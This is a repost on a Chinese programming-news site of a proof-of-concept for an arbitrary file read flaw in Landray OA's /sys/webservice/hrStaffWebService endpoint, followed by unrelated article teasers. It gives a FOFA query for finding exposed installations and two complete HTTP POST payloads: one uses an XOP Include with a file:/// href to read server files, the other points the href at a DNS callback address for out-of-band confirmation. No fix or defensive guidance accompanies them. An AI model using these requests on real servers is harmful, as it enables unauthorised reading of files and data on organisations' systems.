蓝凌OA /sys/webservice/hrStaffWebService存在任意文件读取漏洞-编程知识

蓝凌OA /sys/webservice/hrStaffWebService存在任意文件读取漏洞

news/2024/11/7 10:32:51/文章来源:https://www.cnblogs.com/lovesaber157/p/18531651

蓝凌OA /sys/webservice/hrStaffWebService接口处存在任意文件读取漏洞

FOFA

app="Landray-OA系统"

POC

文件读取

POST /sys/webservice/hrStaffWebService HTTP/1.1
Host: 
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 619
Connection: close------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"<soapenv:Envelope xmlns:soapenv="" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body><web:getHrStaffElements><arg0><beginTimeStamp>1</beginTimeStamp><count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///"></xop:Include></count></arg0></web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--

DNS带外
因为这个漏洞第一眼就觉得是XXE漏洞，然后就测试了下XXE的DNS带外的方式。

POST /sys/webservice/hrStaffWebService HTTP/1.1
Host: 
Content-Type: multipart/related; boundary=----j0ofrwsv2dtllbzzkyh9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36
Content-Length: 598
Connection: close
SOAPAction: ""------j0ofrwsv2dtllbzzkyh9
Content-Disposition: form-data; name="1"<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.staff.hr.kmss.landray.com/">
<soapenv:Header>
<soapenv:Body><web:getHrStaffElements><arg0><beginTimeStamp>1</beginTimeStamp><count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="http://dns网址"></xop:Include></count></arg0></web:getHrStaffElements>
</soapenv:Body>
</soapenv:Header>
</soapenv:Envelope>
------j0ofrwsv2dtllbzzkyh9--

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/828195.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

安装和配置CentOS9

安装和配置CentOS9 一、下载CentOS9镜像文件 1.访问官网：首先，你需要访问CentOS的官网或阿里云镜像网站 2.选择版本：在官网上，选择CentOS9的64位操作系统版本进行下载。3.等待下载：点击下载链接后，等待镜像文件下载完成。二、安装CentOS9 1. 创建虚拟机（以VMware WorkS…

wed服务器一览

cs架构 c客户端 s服务端 bs架构浏览器nb(客户端) 网站是做服务端客户端浏览器到服务器请求服务器到客户端浏览器相应

WebSocket简介

一、websocket简介 websocket是一种在单个TCP连接上进行全双工通信的协议。 websocket使得客户端和服务器之间的数据交换变得更加简单，允许服务端主动向客户端推送数据。在WebSocket API中，浏览器和服务器只需要完成一次握手，两者之间就直接可以创建持久性的连接，并进行双向…

袋鼠云港口数智化解决方案发布，数智引领，加速“智变”丨2024袋鼠云秋季发布会回顾

2023年12月，交通运输部印发《关于加快智慧港口和智慧航道建设的意见》，《意见》贯穿了“3条主线”，其中最首要的主线是“数字化”，数字化是基础，必须通过数字赋能建设、生产、运营、管理、服务的全要素、全过程、全场景，将数据作为新的生产要素，方可夯实智慧港口和智慧航…

Netty 如何自动探测内存泄露的发生

本文基于 Netty 4.1.112.Final 版本进行讨论本文是 Netty 内存管理系列的最后一篇文章，在第一篇文章《聊一聊 Netty 数据搬运工 ByteBuf 体系的设计与实现》中，笔者以 UnpooledByteBuf 为例，从整个内存管理的外围对 ByteBuf 的整个设计体系进行了详细的拆解剖析，随后在第…

ABB机器人IRB6640驱动器维修诊断分析

ABB工业机械手IRB6640是工业自动化领域的重要设备，其伺服驱动单元作为机器人的核心部件，负责提供动力和控制机器人的运动。然而，由于长时间运行、负载变化等因素，驱动单元可能会出现故障。一、ABB工业机械手IRB6640驱动器维修与诊断分析方法1.故障代码诊断： - ABB机器人伺…

HCL AppScan Standard 10.7.0 发布下载，新增功能介绍

HCL AppScan Standard 10.7.0 (Windows) - Web 应用程序安全测试HCL AppScan Standard 10.7.0 (Windows) - Web 应用程序安全测试 HCL AppScan Standard v10 for Windows Multilingual 请访问原文链接：https://sysin.org/blog/appscan-10/ 查看最新版。原创作品，转载请保留出…

惊爆！这些项目管理神器，让你的工作效率瞬间翻倍！

你是否还在为繁琐的项目管理而头疼？是否觉得团队沟通不畅、任务分配混乱、进度跟踪困难？别担心，今天我们就为你揭秘几款项目管理工具软件，它们将彻底改变你的工作方式，让你的工作效率瞬间翻倍！一、板栗看板板栗看板是一款以直观、易用为特点的国产项目管理软件，它采用看…

Dubbo介绍

Dubbo介绍概要Dubbo是一个高性能的Java RPC框架。它提供了三大核心能力：面向接口的远程方法调用，智能容错和负载均衡，以及服务自动注册和发现。简单来说 Dubbo 是一个分布式服务框架，致力于提供高性能和透明化的RPC远程服务调用方案，以及SOA服务治理方案一、面向接口的远程…

AnytimeCL：难度加大，支持任意持续学习场景的新方案 | ECCV24

来源：晓飞的算法工程笔记公众号，转载请注明出处论文: Anytime Continual Learning for Open Vocabulary Classification论文地址：https://arxiv.org/abs/2409.08518 论文代码：https://github.com/jessemelpolio/AnytimeCL创新点在线训练时，每个批次由新训练样本和类别平衡…